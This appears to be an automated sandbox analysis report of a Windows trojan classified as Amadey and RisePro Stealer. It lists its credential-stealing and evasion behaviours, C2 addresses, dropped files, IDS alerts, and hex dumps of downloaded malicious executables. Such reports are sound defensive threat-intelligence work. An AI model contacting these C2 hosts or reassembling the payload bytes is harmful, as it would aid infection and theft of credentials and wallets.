Windows Analysis Report
UeW2b6mU6Z.exe

Overview

General Information

Sample name: UeW2b6mU6Z.exe
renamed because original name is a hash value
Original sample name: a0de5117f2db3409eeb42464b5c2e811.exe
Analysis ID: 1428439
MD5: a0de5117f2db3409eeb42464b5c2e811
SHA1: 20300a63f6c8ccce917110e53bd8d4f1a49407fc
SHA256: 3ed276242a69770fe215a6cb9941f57e24eb2289635c65c54353fe62ea015e8e
Tags: 32, exe, trojan

Detection

Amadey, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: UeW2b6mU6Z.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll Avira: detection malicious, Label: TR/ClipBanker.tbxxw
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 26.2.rundll32.exe.6c8b0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": ["193.233.132.167/enigma/index.php"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll ReversingLabs: Detection: 91%
Source: UeW2b6mU6Z.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Joe Sandbox ML: detected
Source: UeW2b6mU6Z.exe Joe Sandbox ML: detected
Source: 26.2.rundll32.exe.6c8b0000.0.unpack String decryptor: 193.233.132.167
Source: 26.2.rundll32.exe.6c8b0000.0.unpack String decryptor: /enigma/index.php
Source: UeW2b6mU6Z.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb< source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdbC source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Management.pdbpdbent.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D611000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini

Networking

Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.4:49737
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49741 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49742 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49743 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49745 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49762 -> 193.233.132.56:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.167 80
Source: Malware configuration extractor IPs: 193.233.132.167
Source: global traffic TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
Source: global traffic TCP traffic: 192.168.2.4:49799 -> 147.45.47.93:58709
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:02 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:03 GMTContent-Type: application/octet-streamContent-Length: 1937408Last-Modified: Thu, 18 Apr 2024 21:23:11 GMTConnection: keep-aliveETag: "66218f3f-1d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2a 52 e4 13 6e 33 8a 40 6e 33 8a 40 6e 33 8a 40 35 5b 89 41 60 33 8a 40 35 5b 8f 41 f0 33 8a 40 bb 5e 8e 41 7c 33 8a 40 bb 5e 89 41 7a 33 8a 40 bb 5e 8f 41 1b 33 8a 40 35 5b 8e 41 7a 33 8a 40 35 5b 8b 41 7d 33 8a 40 6e 33 8b 40 ba 33 8a 40 f5 5d 83 41 6f 33 8a 40 f5 5d 75 40 6f 33 8a 40 f5 5d 88 41 6f 33 8a 40 52 69 63 68 6e 33 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 15 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 aa 01 00 00 00 00 00 00 b0 4c 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4c 00 00 04 00 00 c6 c6 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 06 00 6a 00 00 00 00 60 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9b 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 9b 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
60 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2b 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 78 63 6e 61 72 75 69 00 80 1a 00 00 20 32 00 00 7e 1a 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 78 67 67 68 72 63 62 00 10 00 00 00 a0 4c 00 00 04 00 00 00 6a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4c 00 00 22 00 00 00 6e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 
61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:09 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Thu, 18 Apr 2024 21:22:12 GMTConnection: keep-aliveETag: "66218f04-11cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 8f 21 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 b9 21 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
